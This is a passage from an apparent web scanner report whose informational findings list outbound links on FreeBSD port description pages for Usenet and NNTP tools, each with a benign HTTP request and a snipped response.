GET /cgi/url.cgi?ports/news/slrn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:32 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
to use but powerful NNTP/spool based newsreader. It is
highly customizable, supports scoring, free key bindings, and can be
extended using the SLang macro language. slrn supports SSL and IPv6.

WWW: <A HREF="http://slrn.sourceforge.net/">http://slrn.sourceforge.net/</A>
...[SNIP]...

20.589. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-NNTPClient/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/NNTPClient/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-NNTPClient/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This module implements a client interface to NNTP, enabling a Perl 5
application to talk to NNTP servers. It uses the OOP (Object Oriented
Programming) interface introduced with Perl 5.

WWW: <A HREF="http://search.cpan.org/dist/NNTPClient/">http://search.cpan.org/dist/NNTPClient/</A>
...[SNIP]...

20.590. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/www/pnews/pkg-descr
The response contains the following links to other domains:
  • http://pnews.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/www/pnews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
d IMAP is not required.
* Authentication is easily configured to work with your existing system.
* Multiple language interface and Traditional/Simplified Chinese coding
conversion.

WWW: <A HREF="http://pnews.sourceforge.net/">http://pnews.sourceforge.net/</A>
...[SNIP]...

20.591. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/cleanscore/pkg-descr
The response contains the following links to other domains:
  • http://slrn.sourceforge.net/cleanscore/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/cleanscore/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
cleanscore is a perl script to clean up your slrn score file.
It can be used to purge expired entries automatically, e.g. by
calling it from cron.

WWW: <A HREF="http://slrn.sourceforge.net/cleanscore/">http://slrn.sourceforge.net/cleanscore/</A>
...[SNIP]...

20.592. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-NewsLib/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/newslib/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-NewsLib/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:19 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
           A standard NNTP authentication method
Net::NNTP::Proxy        A news server in perl
Net::NNTP::Client        Simulate an entire NNTP client
Net::NNTP::Functions        Code to implement NNTP-standard functions

WWW: <A HREF="http://search.cpan.org/dist/newslib/">http://search.cpan.org/dist/newslib/</A>
...[SNIP]...

20.593. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/mail/adcomplain/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.rdrop.com/users/billmc/adcomplain.html

Request

GET /cgi/url.cgi?ports/mail/adcomplain/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:13 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
to complain. Mail bombing (e-mailing megabytes
of useless data) and public flaming (replying on usenet, causing your
complaint to be duplicated on every machine in the network) are
discouraged.

WWW: <A HREF="http://www.rdrop.com/users/billmc/adcomplain.html">http://www.rdrop.com/users/billmc/adcomplain.html</A>
...[SNIP]...

20.594. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/cnews/pkg-descr
The response contains the following links to other domains:
  • http://www.dinoex.net/c-news.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/cnews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
</A>
WWW: <A HREF="http://www.dinoex.net/c-news.html">http://www.dinoex.net/c-news.html</A>
...[SNIP]...

20.595. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/crashmail/pkg-descr
The response contains the following links to other domains:
  • http://www.df.lth.se/~billing/crashmail.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/crashmail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
for
the Amiga called CrashMail. This is the new generation of that tosser!
This generation is more basic without the fancy GUI, but does what it
is supposed to do and is above all more portable.

WWW: <A HREF="http://www.df.lth.se/~billing/crashmail.html">http://www.df.lth.se/~billing/crashmail.html</A>
...[SNIP]...

20.596. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/papercut/pkg-descr
The response contains the following links to other domains:
  • http://pessoal.org/papercut/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/papercut/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
t is a news server written in 100% pure Python. It designed
to be use as backend for PHP, or to be run on a small network.
Messages can be stored in a MySQL database.
It doesn't support feeding.

WWW: <A HREF="http://pessoal.org/papercut/">http://pessoal.org/papercut/</A>
...[SNIP]...

20.597. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/nntpswitch/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.nntpswitch.org/

Request

GET /cgi/url.cgi?ports/news/nntpswitch/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
n the backend server type, all NNTP commands and extensions
are supported, including (remote) authorization. Accounting is supported
in a user-friendly matter for data limited NNTP connections.

WWW: <A HREF="http://www.nntpswitch.org/">http://www.nntpswitch.org/</A>
...[SNIP]...

20.598. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/dnews/pkg-descr
The response contains the following links to other domains:
  • http://netwinsite.com/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/dnews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:31 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
y, totally configurable without recompiling
- Documentated
- Supported
- Speed
- XOVER implemented in software
- Streaming support
- Strictly limited machine impact due to single threaded nature

WWW: <A HREF="http://netwinsite.com/">http://netwinsite.com/</A>
...[SNIP]...

20.599. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/PicMonger/pkg-descr
The response contains the following links to other domains:
  • http://picmonger.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/PicMonger/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
s files and decodes only the file types you select
* Easy installation (uses GNU autoconf/automake)
* Error logging for easy troubleshooting (rarely an issue)
* Distributed under the GNU GPL

WWW: <A HREF="http://PicMonger.sourceforge.net/">http://PicMonger.sourceforge.net/</A>
...[SNIP]...

20.600. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/trn4/pkg-descr
The response contains the following links to other domains:
  • http://sourceforge.net/projects/trn/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/trn4/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:40 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This is version 4.0 of trn, the threaded news reader. This version
has improved online help, mouse support in xterms, article scoring,
and other new features.

WWW: <A HREF="http://sourceforge.net/projects/trn/">http://sourceforge.net/projects/trn/</A>
...[SNIP]...

20.601. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/nzbget/pkg-descr
The response contains the following links to other domains:
  • http://docs.newzbin.com/
  • http://sourceforge.net/projects/nzbget/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/nzbget/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:13 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
NZBGet is a binary newsgrabber, which downloads files from usenet based
on information given in nzb-files. Descriptino of nzb format is available
at <A HREF="http://docs.newzbin.com/">http://docs.newzbin.com/</A>

WWW: <A HREF="http://sourceforge.net/projects/nzbget/">http://sourceforge.net/projects/nzbget/</A>
...[SNIP]...

20.602. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/c-nocem/pkg-descr
The response contains the following links to other domains:
  • http://sites.inka.de/~bigred/sw/c-nocem.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/c-nocem/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
e state like .newsrc files, it processes only "hide" actions,
and that only by actually deleting the articles.

c-nocem is designed for easy setup and fast run and needs no
maintenance.

WWW: <A HREF="http://sites.inka.de/~bigred/sw/c-nocem.html">http://sites.inka.de/~bigred/sw/c-nocem.html</A>
...[SNIP]...

20.603. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/ija/pkg-descr
The response contains the following links to other domains:
  • http://wildspark.com/asher/ija/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/ija/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Ija is an interactive command line program that lets you access
Deja (formerly Dejanews) without the web interface.

WWW: <A HREF="http://wildspark.com/asher/ija/">http://wildspark.com/asher/ija/</A>
...[SNIP]...

20.604. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/nzbperl/pkg-descr
The response contains the following links to other domains:
  • http://noisybox.net/computers/nzbperl/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/nzbperl/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
pports automated
parsing and sorting of nzb files, multiple servers, automated downloading,
assmbling and decoding of message parts, and has user controlled bandwidth
throttling during runtime.

WWW: <A HREF="http://noisybox.net/computers/nzbperl/">http://noisybox.net/computers/nzbperl/</A>
...[SNIP]...

20.605. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/slrnface/pkg-descr
The response contains the following links to other domains:
  • http://dave.willfork.com/slrnface/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/slrnface/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:33 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
slrnface shows X-Faces from slrn in an X11 terminal emulator

WWW: <A HREF="http://dave.willfork.com/slrnface/">http://dave.willfork.com/slrnface/</A>
...[SNIP]...

20.606. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/fidogate-ds/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.sourceforge.net/projects/rusfidogate/

Request

GET /cgi/url.cgi?ports/news/fidogate-ds/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
DS fork of fidogate. It can be used as:
* Fido-Internet Gateway
* Fido FTN-FTN Gateway
* Fido Mail Processor
* Fido File Processor
* Fido Areafix/Filefix

WWW: <A HREF="http://www.sourceforge.net/projects/rusfidogate/">http://www.sourceforge.net/projects/rusfidogate/</A>
...[SNIP]...

20.607. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/yencode/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.yencode.org/

Request

GET /cgi/url.cgi?ports/news/yencode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:45 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
or multipart
encoded archives in specified directories or recursively.
- Supports SFV file creation for multiple-file archives.
- Fully compliant with the current yEnc specifications.

WWW: <A HREF="http://www.yencode.org/">http://www.yencode.org/</A>
...[SNIP]...

20.608. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-Gateway/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/Gateway
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-Gateway/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
